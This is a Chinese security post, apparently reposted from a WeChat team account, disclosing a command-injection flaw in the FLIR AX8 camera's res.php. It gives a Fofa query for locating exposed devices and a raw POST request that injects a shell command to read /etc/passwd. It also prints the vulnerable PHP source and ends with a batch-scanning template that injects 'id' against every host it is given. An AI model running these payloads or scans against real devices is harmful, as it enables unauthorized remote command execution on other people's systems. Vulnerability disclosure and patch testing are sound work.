01
#漏洞描述#
FLIR-AX8 res.php 文件存在命令执行漏洞,攻击者可以获取服务器权限
01
#漏洞复现#
步骤一:使用以下语法进行资产搜索并确定攻击目标...
# Fofa搜索app="FLIR-FLIR-AX8"
步骤二:开启BP并抓取首页数据包....修改数据包如下即可造成命令执行....
POST /res.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 39action=node&resource=$(cat /etc/passwd)
步骤三:由于大部分设备处于内网且资产较少故不做深度漏洞测试...Over!
if (isset($_POST["action"])) {switch ($_POST["action"]) {case "get":if(isset($_POST["resource"])){switch ($_POST["resource"]) {case ".rtp.hflip":if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {$result = "false";break;}$result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";break;case ".rtp.vflip":if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {$result = "false";break;}$result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";break;default:$result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));}}break;case "set":if(isset($_POST["resource"]) and isset($_POST["value"])) {switch ($_POST["resource"]) {case "rtp.hflip":file_put_contents("/FLIR/system/journal.d/horizontal_flip.cfg", $_POST["value"] === "true" ? "1" : "0");break;case "rtp.vflip":file_put_contents("/FLIR/system/journal.d/vertical_flip.cfg", $_POST["value"] === "true" ? "1" : "0");break;default:$result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rset ".$_POST["resource"]." ".$_POST["value"]));;}}break;case "measurement":if (isset($_POST["type"]) && isset($_POST["id"])) {$nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.measureFuncs.".$_POST["type"].".".$_POST["id"]));$lines = explode("n", $nodeData);foreach($lines as $line){$resource = preg_split('/s+/', $line);$value = trim($resource[1], """);$result[$resource[0]] = $value;}}break;case "global-parameters":$nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.basicImgData.objectParams"));$lines = explode("n", $nodeData);foreach($lines as $line){$resource = preg_split('/s+/', $line);$result[$resource[0]] = $resource[1];}case "alarm":if(isset($_POST["id"])){$nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls .image.sysimg.alarms.measfunc.".$_POST["id"]));$lines = explode("n", $nodeData);foreach($lines as $line){$resource = preg_split('/s+/', $line);$value = trim($resource[1], """);$result[$resource[0]] = $value;}}break;case "calibrate":$result = shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/nuc");break;case "node":$nodes = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls ".$_POST["resource"]));$result = preg_split("/s+n/", $nodes);break;}echo json_encode($result);}
01
#批量脚本#
id: flir-ax8rceinfo:name: flir-ax8rceauthor: Ph9arseverity: highdescription: flir-ax8rcereference:https://4pts.onlinetags: rcerequests:raw:|-POST /res.php HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: gzip, deflateConnection: close: 1: application/x-www-form-urlencoded: 26action=node&resource=$(id): andmatchers:type: wordpart: bodywords:roottype: statusstatus:200
揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!
原文始发于微信公众号(揽月安全团队):FLIR-AX8存在RCE漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论